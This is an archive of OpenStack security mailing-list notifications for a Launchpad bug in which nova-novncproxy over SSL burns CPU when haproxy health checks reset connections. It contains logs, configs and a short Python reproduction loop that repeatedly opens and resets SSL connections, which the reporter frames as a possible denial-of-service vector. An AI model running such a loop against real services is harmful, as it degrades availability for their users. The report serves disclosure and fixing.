/usr/lib/python2.7/site-packag es/oslo_concurrency/lockutils.py:273 2019-02-19 15:02:45.382 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "00000000-0000-0000-0000-000000000000" released by "nova.context.get_or_set_cached_cell_and_set_connections" :: held 0.002s inner /usr/lib/python2.7/site-packages /oslo_concurrency/lockutils.py:285 2019-02-19 15:02:45.393 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "9f9825dd-868f-41cc-9c8e-e544f1528d6a" acquired by "nova.context.get_or_set_cached_cell_and_set_connections" :: waited 0.000s inner /usr/lib/python2.7/site-packag es/oslo_concurrency/lockutils.py:273 2019-02-19 15:02:45.395 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "9f9825dd-868f-41cc-9c8e-e544f1528d6a" released by "nova.context.get_or_set_cached_cell_and_set_connections" :: held 0.003s inner /usr/lib/python2.7/site-packages /oslo_concurrency/lockutils.py:285 2019-02-19 15:02:45.437 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.443 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 
2019-02-19 15:02:45.451 2889 INFO nova.compute.rpcapi [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Automatically selected compute RPC version 5.0 from minimum service version 35 2019-02-19 15:02:45.452 2889 INFO nova.console.websocketproxy [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] handler exception: [Errno 104] Connection reset by peer 2019-02-19 15:02:45.452 2889 DEBUG nova.console.websocketproxy [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] exception vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy Traceback (most recent call last): 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 928, in top_new_client 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy client = self.do_handshake(startsock, address) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 858, in do_handshake 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.RequestHandlerClass(retsock, address, self) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/nova/console/websocketproxy.py", line 311, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy websockify.ProxyRequestHandler.__init__(self, *args, **kwargs) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 113, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy SimpleHTTPRequestHandler.__init__(self, req, addr, server) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/SocketServer.py", line 652, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.handle() 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 579, in handle 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy SimpleHTTPRequestHandler.handle(self) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/BaseHTTPServer.py", line 340, in handle 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.handle_one_request() 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/BaseHTTPServer.py", line 310, in handle_one_request 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.raw_requestline = self.rfile.readline(65537) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/socket.py", line 480, in readline 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy data = self._sock.recv(self._rbufsize) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 190, in recv 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy return self._base_recv(buflen, flags, into=False) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 217, in _base_recv 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy read = self.read(nbytes) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 135, in read 2019-02-19 15:02:45.452 
2889 ERROR nova.console.websocketproxy super(GreenSSLSocket, self).read, *args, **kwargs) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 109, in _call_trampolining 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy return func(*a, **kw) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/ssl.py", line 673, in read 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy v = self._sslobj.read(len) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy error: [Errno 104] Connection reset by peer 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy 2019-02-19 15:02:47.037 2880 DEBUG nova.console.websocketproxy [-] 192.168.237.85: new handler Process vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 (paste: http://paste.openstack.org/show/745451/)

This sequence starting with the "new handler Process" repeats continuously. It seems that the haproxy health checks initiate an SSL connection but then immediately send a TCP RST: http://git.haproxy.org/?p=haproxy.git;a=commit;h=fd29cc537b8511db6e256529ded625c8e7f856d0

For most services this does not seem to be an issue, but for nova-novncproxy it repeatedly initializes NovaProxyRequestHandler which creates a full nova.compute.rpcapi.ComputeAPI instance which very quickly starts to consume significant CPU and overtake the host. Note that we tried upgrading to HEAD of websockify and eventlet which did not improve the issue.

Our workaround was to turn off check-ssl in haproxy and use a basic tcp check, but we're concerned that nova-novncproxy remains vulnerable to a DOS attack given how easy it is for haproxy to overload the service. For that reason I'm opening this initially as a security bug, though you could perhaps argue that it's no secret that making un-ratelimited requests at any service will cause high load.

Steps to reproduce
==================

1. Configure nova-novncproxy to use SSL by setting the cert= and key= parameters in [DEFAULT] and turn on debug logging.

2. You can simulate the haproxy SSL health check with this python script:

    import socket, ssl, struct, time
    host = '192.168.237.81'
    port = 5554
    while True:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        ssl_sock = ssl.wrap_socket(sock)
        ssl_sock.connect((host, port))
        ssl_sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
        sock.close()
        time.sleep(2)

Expected result
===============

nova-novncproxy should gracefully handle the RST and not start overutilizing CPU. It should probably hold off on initializing database connections and such until a meaningful request other than an SSL HELLO is received.

Actual result
=============

The nova-novncproxy process quickly jumps to the top of the CPU% metrics of process analyzers like top and htop and if left unattended on a server with few cores will cause the server's overall performance to be degraded.
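The "hold off on initializing" suggestion in the expected result is essentially lazy initialization. A generic sketch of that pattern follows; it is not the fix actually proposed for this bug, and ExpensiveRpcClient is a stand-in for whatever is costly to build (in nova's case a nova.compute.rpcapi.ComputeAPI):

    # Build the expensive object on first real use instead of once per TCP
    # connection, so a connection reset during the SSL handshake costs nothing.
    class ExpensiveRpcClient(object):
        def __init__(self):
            print("expensive setup happens here")  # placeholder for real work

    class ProxyHandler(object):
        def __init__(self):
            self._rpc_client = None  # cheap: nothing is built during the handshake

        @property
        def rpc_client(self):
            if self._rpc_client is None:
                self._rpc_client = ExpensiveRpcClient()
            return self._rpc_client

        def handle_request(self, token):
            # Only a request that survived the handshake touches the client.
            return self.rpc_client

    if __name__ == "__main__":
        handler = ProxyHandler()                  # per-connection cost stays small
        handler.handle_request("console-token")   # expensive setup paid only here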
Environment =========== We found this on the latest of the stable/rocky branch on SLES: # cat /etc/os-release NAME="SLES" VERSION="12-SP4" VERSION_ID="12.4" PRETTY_NAME="SUSE Linux Enterprise Server 12 SP4" # uname -a Linux d52-54-77-77-01-01 4.12.14-95.6-default #1 SMP Thu Jan 17 06:04:39 UTC 2019 (6af4ef8) x86_64 x86_64 x86_64 GNU/Linux # zypper info openstack-nova Information for package openstack-nova: --------------------------------------- Repository : Cloud Name : openstack-nova Version : 18.1.1~dev47-749.1 Arch : noarch Vendor : obs://build.suse.de/Devel:Cloud Support Level : Level 3 Installed Size : 444.7 KiB Installed : Yes Status : up-to-date Source package : openstack-nova-18.1.1~dev47-749.1.src Summary : OpenStack Compute (Nova) # zypper info haproxy Information for package haproxy: -------------------------------- Repository : Cloud Name : haproxy Version : 1.6.11-10.2 Arch : x86_64 Vendor : SUSE LLC Support Level : Level 3 Installed Size : 3.1 MiB Installed : Yes Status : up-to-date Source package : haproxy-1.6.11-10.2.src ** Changed in: ossa Status: Incomplete => Won't Fix ** Tags added: security ** Information type changed from Private Security to Public -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1816727 Title: nova-novncproxy does not handle TCP RST cleanly when using SSL Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Won't Fix Bug description: Description =========== We have nova-novncproxy configured to use SSL: ``` [DEFAULT] ssl_only=true cert = /etc/nova/ssl/certs/signing_cert.pem key = /etc/nova/ssl/private/signing_key.pem ... [vnc] enabled = True server_listen = "0.0.0.0" server_proxyclient_address = 192.168.237.81 novncproxy_host = 192.168.237.81 novncproxy_port = 5554 novncproxy_base_url = https://:6080/vnc_auto.html xvpvncproxy_host = 192.168.237.81 ``` We also have haproxy acting as a load balancer, but not terminating SSL. We have an haproxy health check configured like this for nova- novncproxy: ``` listen nova-novncproxy     # irrelevant config...     server 192.168.237.84:5554 check check-ssl verify none inter 2000 rise 5 fall 2 ``` where 192.168.237.81 is a virtual IP address and 192.168.237.84 is the node's individual IP address. With that health check enabled, we found the nova-novncproxy process CPU spiking and eventually causing the node to hang. With debug logging enabled, we noticed this in the nova-novncproxy logs: 2019-02-19 15:02:44.148 2880 INFO nova.console.websocketproxy [-] WebSocket server settings: 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Listen on 192.168.237.81:5554 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Flash security policy server 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Web server (no directory listings). 
Web root: /usr/share/novnc 2019-02-19 15:02:44.150 2880 INFO nova.console.websocketproxy [-] - SSL/TLS support 2019-02-19 15:02:44.151 2880 INFO nova.console.websocketproxy [-] - proxying from 192.168.237.81:5554 to None:None 2019-02-19 15:02:45.015 2880 DEBUG nova.console.websocketproxy [-] 192.168.237.85: new handler Process vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 2019-02-19 15:02:45.184 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.377 2889 DEBUG nova.context [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Found 2 cells: 00000000-0000-0000-0000-000000000000(cell0),9f9825dd-868f-41cc-9c8e-e544f1528d6a(cell1) load_cells /usr/lib/python2.7/site-packages/nova/context.py:479 2019-02-19 15:02:45.380 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "00000000-0000-0000-0000-000000000000" acquired by "nova.context.get_or_set_cached_cell_and_set_connections" :: waited 0.000s inner /usr/lib/python2.7/site-packag es/oslo_concurrency/lockutils.py:273 2019-02-19 15:02:45.382 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "00000000-0000-0000-0000-000000000000" released by "nova.context.get_or_set_cached_cell_and_set_connections" :: held 0.002s inner /usr/lib/python2.7/site-packages /oslo_concurrency/lockutils.py:285 2019-02-19 15:02:45.393 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "9f9825dd-868f-41cc-9c8e-e544f1528d6a" acquired by "nova.context.get_or_set_cached_cell_and_set_connections" :: waited 0.000s inner /usr/lib/python2.7/site-packag es/oslo_concurrency/lockutils.py:273 2019-02-19 15:02:45.395 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "9f9825dd-868f-41cc-9c8e-e544f1528d6a" released by "nova.context.get_or_set_cached_cell_and_set_connections" :: held 0.003s inner /usr/lib/python2.7/site-packages /oslo_concurrency/lockutils.py:285 2019-02-19 15:02:45.437 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.443 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.451 2889 INFO nova.compute.rpcapi [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Automatically selected compute RPC version 5.0 from minimum service version 35 2019-02-19 15:02:45.452 2889 INFO nova.console.websocketproxy [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] handler exception: [Errno 104] Connection reset by peer 2019-02-19 15:02:45.452 2889 DEBUG nova.console.websocketproxy [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - 
- - -] exception vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy Traceback (most recent call last): 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 928, in top_new_client 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy client = self.do_handshake(startsock, address) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 858, in do_handshake 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.RequestHandlerClass(retsock, address, self) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/nova/console/websocketproxy.py", line 311, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy websockify.ProxyRequestHandler.__init__(self, *args, **kwargs) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 113, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy SimpleHTTPRequestHandler.__init__(self, req, addr, server) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/SocketServer.py", line 652, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.handle() 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 579, in handle 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy SimpleHTTPRequestHandler.handle(self) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/BaseHTTPServer.py", line 340, in handle 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.handle_one_request() 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/BaseHTTPServer.py", line 310, in handle_one_request 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.raw_requestline = self.rfile.readline(65537) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/socket.py", line 480, in readline 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy data = self._sock.recv(self._rbufsize) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 190, in recv 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy return self._base_recv(buflen, flags, into=False) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 217, in _base_recv 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy read = self.read(nbytes) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 135, in read 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy super(GreenSSLSocket, self).read, *args, **kwargs) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 109, in _call_trampolining 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy return func(*a, **kw) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/ssl.py", line 673, in read 2019-02-19 
15:02:45.452 2889 ERROR nova.console.websocketproxy v = self._sslobj.read(len) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy error: [Errno 104] Connection reset by peer 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy 2019-02-19 15:02:47.037 2880 DEBUG nova.console.websocketproxy [-] 192.168.237.85: new handler Process vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 (paste: http://paste.openstack.org/show/745451/) This sequence starting with the "new handler Process" repeats continuously. It seems that the haproxy health checks initiate an SSL connection but then immediately send a TCP RST: http://git.haproxy.org/?p=haproxy.git;a=commit;h=fd29cc537b8511db6e256529ded625c8e7f856d0 For most services this does not seem to be an issue, but for nova- novncproxy it repeatedly initializes NovaProxyRequestHandler which creates a full nova.compute.rpcapi.ComputeAPI instance which very quickly starts to consume significant CPU and overtake the host. Note that we tried upgrading to HEAD of websockify and eventlet which did not improve the issue. Our workaround was to turn off check-ssl in haproxy and use a basic tcp check, but we're concerned that nova-novncproxy remains vulnerable to a DOS attack given how easy it is for haproxy to overload the service. For that reason I'm opening this initially as a security bug, though you could perhaps argue that it's no secret that making un-ratelimited requests at any service will cause high load. Steps to reproduce ================== 1. Configure nova-novncproxy to use SSL by setting the cert= and key= parameters in [DEFAULT] and turn on debug logging. 2. You can simulate the haproxy SSL health check with this python script:     import socket, ssl, struct, time     host = '192.168.237.81'     port = 5554     while True:         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)         ssl_sock = ssl.wrap_socket(sock)         ssl_sock.connect((host, port))         ssl_sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))         sock.close()         time.sleep(2) Expected result =============== nova-novncproxy should gracefully handle the RST and not start overutilizing CPU. It should probably hold off on initializing database connections and such until a meaningful request other than an SSL HELLO is received. Actual result ============= The nova-novncproxy process quickly jumps to the top of the CPU% metrics of process analyzers like top and htop and if left unattended on a server with few cores will cause the server's overall performance to be degraded. 
Environment =========== We found this on the latest of the stable/rocky branch on SLES: # cat /etc/os-release NAME="SLES" VERSION="12-SP4" VERSION_ID="12.4" PRETTY_NAME="SUSE Linux Enterprise Server 12 SP4" # uname -a Linux d52-54-77-77-01-01 4.12.14-95.6-default #1 SMP Thu Jan 17 06:04:39 UTC 2019 (6af4ef8) x86_64 x86_64 x86_64 GNU/Linux # zypper info openstack-nova Information for package openstack-nova: --------------------------------------- Repository : Cloud Name : openstack-nova Version : 18.1.1~dev47-749.1 Arch : noarch Vendor : obs://build.suse.de/Devel:Cloud Support Level : Level 3 Installed Size : 444.7 KiB Installed : Yes Status : up-to-date Source package : openstack-nova-18.1.1~dev47-749.1.src Summary : OpenStack Compute (Nova) # zypper info haproxy Information for package haproxy: -------------------------------- Repository : Cloud Name : haproxy Version : 1.6.11-10.2 Arch : x86_64 Vendor : SUSE LLC Support Level : Level 3 Installed Size : 3.1 MiB Installed : Yes Status : up-to-date Source package : haproxy-1.6.11-10.2.src To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1816727/+subscriptions From 1816727 at bugs.launchpad.net Wed Mar 20 20:39:29 2019 From: 1816727 at bugs.launchpad.net (OpenStack Infra) Date: Wed, 20 Mar 2019 20:39:29 -0000 Subject: [Openstack-security] =?utf-8?q?=5BBug_1816727=5D_Re=3A_nova-novnc?= =?utf-8?q?proxy_does_not_handle_TCP_RST_cleanly_when_using_SSL=C2=A0?= References: <155065649227.28374.17032096910895521610.malonedeb@chaenomeles.canonical.com> Message-ID: <155311436940.19441.7529218002646289218.malone@chaenomeles.canonical.com> Fix proposed to branch: master Review: https://review.openstack.org/644998 ** Changed in: nova Status: New => In Progress ** Changed in: nova Assignee: (unassigned) => melanie witt (melwitt) -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1816727 Title: nova-novncproxy does not handle TCP RST cleanly when using SSL Status in OpenStack Compute (nova): In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: Description =========== We have nova-novncproxy configured to use SSL: ``` [DEFAULT] ssl_only=true cert = /etc/nova/ssl/certs/signing_cert.pem key = /etc/nova/ssl/private/signing_key.pem ... [vnc] enabled = True server_listen = "0.0.0.0" server_proxyclient_address = 192.168.237.81 novncproxy_host = 192.168.237.81 novncproxy_port = 5554 novncproxy_base_url = https://:6080/vnc_auto.html xvpvncproxy_host = 192.168.237.81 ``` We also have haproxy acting as a load balancer, but not terminating SSL. We have an haproxy health check configured like this for nova- novncproxy: ``` listen nova-novncproxy     # irrelevant config...     server 192.168.237.84:5554 check check-ssl verify none inter 2000 rise 5 fall 2 ``` where 192.168.237.81 is a virtual IP address and 192.168.237.84 is the node's individual IP address. With that health check enabled, we found the nova-novncproxy process CPU spiking and eventually causing the node to hang. 
With debug logging enabled, we noticed this in the nova-novncproxy logs: 2019-02-19 15:02:44.148 2880 INFO nova.console.websocketproxy [-] WebSocket server settings: 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Listen on 192.168.237.81:5554 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Flash security policy server 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Web server (no directory listings). Web root: /usr/share/novnc 2019-02-19 15:02:44.150 2880 INFO nova.console.websocketproxy [-] - SSL/TLS support 2019-02-19 15:02:44.151 2880 INFO nova.console.websocketproxy [-] - proxying from 192.168.237.81:5554 to None:None 2019-02-19 15:02:45.015 2880 DEBUG nova.console.websocketproxy [-] 192.168.237.85: new handler Process vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 2019-02-19 15:02:45.184 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.377 2889 DEBUG nova.context [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Found 2 cells: 00000000-0000-0000-0000-000000000000(cell0),9f9825dd-868f-41cc-9c8e-e544f1528d6a(cell1) load_cells /usr/lib/python2.7/site-packages/nova/context.py:479 2019-02-19 15:02:45.380 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "00000000-0000-0000-0000-000000000000" acquired by "nova.context.get_or_set_cached_cell_and_set_connections" :: waited 0.000s inner /usr/lib/python2.7/site-packag es/oslo_concurrency/lockutils.py:273 2019-02-19 15:02:45.382 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "00000000-0000-0000-0000-000000000000" released by "nova.context.get_or_set_cached_cell_and_set_connections" :: held 0.002s inner /usr/lib/python2.7/site-packages /oslo_concurrency/lockutils.py:285 2019-02-19 15:02:45.393 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "9f9825dd-868f-41cc-9c8e-e544f1528d6a" acquired by "nova.context.get_or_set_cached_cell_and_set_connections" :: waited 0.000s inner /usr/lib/python2.7/site-packag es/oslo_concurrency/lockutils.py:273 2019-02-19 15:02:45.395 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "9f9825dd-868f-41cc-9c8e-e544f1528d6a" released by "nova.context.get_or_set_cached_cell_and_set_connections" :: held 0.003s inner /usr/lib/python2.7/site-packages /oslo_concurrency/lockutils.py:285 2019-02-19 15:02:45.437 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.443 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 
2019-02-19 15:02:45.451 2889 INFO nova.compute.rpcapi [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Automatically selected compute RPC version 5.0 from minimum service version 35 2019-02-19 15:02:45.452 2889 INFO nova.console.websocketproxy [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] handler exception: [Errno 104] Connection reset by peer 2019-02-19 15:02:45.452 2889 DEBUG nova.console.websocketproxy [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] exception vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy Traceback (most recent call last): 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 928, in top_new_client 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy client = self.do_handshake(startsock, address) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 858, in do_handshake 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.RequestHandlerClass(retsock, address, self) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/nova/console/websocketproxy.py", line 311, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy websockify.ProxyRequestHandler.__init__(self, *args, **kwargs) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 113, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy SimpleHTTPRequestHandler.__init__(self, req, addr, server) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/SocketServer.py", line 